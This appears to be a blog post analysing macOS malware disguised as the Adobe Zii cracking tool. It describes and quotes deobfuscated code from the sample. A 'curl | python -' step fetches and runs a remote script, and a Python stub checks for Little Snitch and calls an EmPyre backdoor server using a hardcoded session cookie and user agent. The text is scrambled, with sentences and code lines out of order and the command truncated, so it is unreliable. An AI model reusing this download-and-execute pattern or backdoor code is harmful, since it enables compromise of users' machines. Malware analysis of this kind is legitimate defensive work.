![]() This script opens up a connection to an EmPyre backend, which is capable of pushing arbitrary commands to the infected Mac. If Little Snitch is present, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would have already blocked the connection that would have attempted to download this script, so checking at this point is worthless.) The first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that would be capable of bringing the backdoor's network connection to the attention of the user. Req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=") UA='Mozilla/5.0 (Windows NT 6.1 WOW64 Trident/7.0 rv:11.0) like Gecko' server='' t='/news.php' req=urllib2.Request(server t) Ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) Import sys import re, subprocess cmd = "ps -ef | grep Little\ Snitch | grep -v grep" What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script: It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually "legitimate." (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.) This script is designed to download and execute a Python script, then download and run an app named sample.app. Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:Ĭurl | python -
0 Comments
Leave a Reply. |